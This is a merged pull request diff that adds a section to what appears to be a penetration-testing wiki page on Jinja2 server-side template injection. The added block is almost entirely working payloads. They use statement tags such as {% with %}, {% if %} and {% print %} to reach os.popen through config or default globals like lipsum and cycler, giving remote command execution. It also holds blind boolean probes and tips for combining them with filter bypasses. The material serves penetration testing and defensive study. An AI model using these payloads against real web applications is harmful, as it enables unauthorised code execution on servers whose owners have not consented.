Merge pull request #2069 from Tukasha/docs/jinja2-statement-tags

Add Jinja statement-tag payload notes

Author: carlospolop

src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md

@@ -175,6 +175,52 @@ The call to `__subclasses__` has given us the opportunity to **access hundreds o
 
 ```
 
+### Payloads with `{% ... %}`
+
+Sometimes `{{ ... }}` is blocked, sanitized or the injection lands inside a statement-friendly context. In those cases you can still abuse Jinja statement tags such as `{% with %}`, `{% if %}`, `{% for %}`, `{% set %}` and, in newer versions, `{% print %}` to execute code, leak data through the block body, or trigger blind side effects.
+
+```python
+{% raw %}
+# Simple statement-tag primitives
+{% print(1) %}
+{% if 7*7 == 49 %}OK{% endif %}
+{% if 7*7 == 50 %}BAD{% else %}ELSE{% endif %}
+{% set x = 7*7 %}{{ x }}
+{% for i in range(3) %}{{ i }}{% endfor %}
+{% with a = ''.__class__ %}{{ a }}{% endwith %}
+{% print(''.__class__.__mro__[1]) %}
+{% with x = ''.__class__.__mro__[1].__subclasses__()|length %}{{ x }}{% endwith %}
+
+# Flask-like contexts: use already reachable globals/functions
+{% with a = config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("id").read() %}{{ a }}{% endwith %}
+{% if config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("id").read().startswith("uid=") %}yes{% endif %}
+
+# Bare Jinja2 Template(...) contexts may not have `config` or `request`,
+# but built-in globals such as `lipsum`, `cycler`, `joiner`, and `namespace`
+# are often still available.
+{% print(lipsum) %}
+{% print(cycler) %}
+{% print(joiner) %}
+{% print(namespace) %}
+{% if 'os' in lipsum.__globals__ %}OS_OK{% endif %}
+{% if cycler.__init__.__globals__ %}G_OK{% endif %}
+
+# RCE using default Jinja globals
+{% print(lipsum.__globals__['os'].popen('id').read()) %}
+{% with x = lipsum.__globals__['os'].popen('id').read() %}{{ x }}{% endwith %}
+{% print(cycler.__init__.__globals__['os'].popen('id').read()) %}
+{% print(joiner.__init__.__globals__['os'].popen('id').read()) %}
+{% print(namespace.__init__.__globals__['os'].popen('id').read()) %}
+
+# Blind / boolean primitive
+{% if 'uid=' in lipsum.__globals__['os'].popen('id').read() %}
+YES
+{% endif %}
+{% endraw %}
+```
+
+If the target filters some chars but still allows statement tags, combine this idea with the [filter bypasses](jinja2-ssti.md#filter-bypasses) and the [no-`{{` / no-`.` / no-`_` example](jinja2-ssti.md#without-several-chars). Also remember that `{% print %}` is not mandatory: on targets where it is unavailable, `{% with %}`, `{% if %}`, `{% set %}` and `{% for %}` are usually enough to keep exploiting the template.
+
 To learn about **more classes** that you can use to **escape** you can **check**:
 
 
@@ -357,6 +403,7 @@ The request will be urlencoded by default according to the HTTP format, which ca
 ## References
 
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2)
+- [https://jinja.palletsprojects.com/en/stable/templates/](https://jinja.palletsprojects.com/en/stable/templates/)
 - Check [attr trick to bypass blacklisted chars in here](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#python3).
 - [https://twitter.com/SecGus/status/1198976764351066113](https://twitter.com/SecGus/status/1198976764351066113)
 - [https://hackmd.io/@Chivato/HyWsJ31dI](https://hackmd.io/@Chivato/HyWsJ31dI)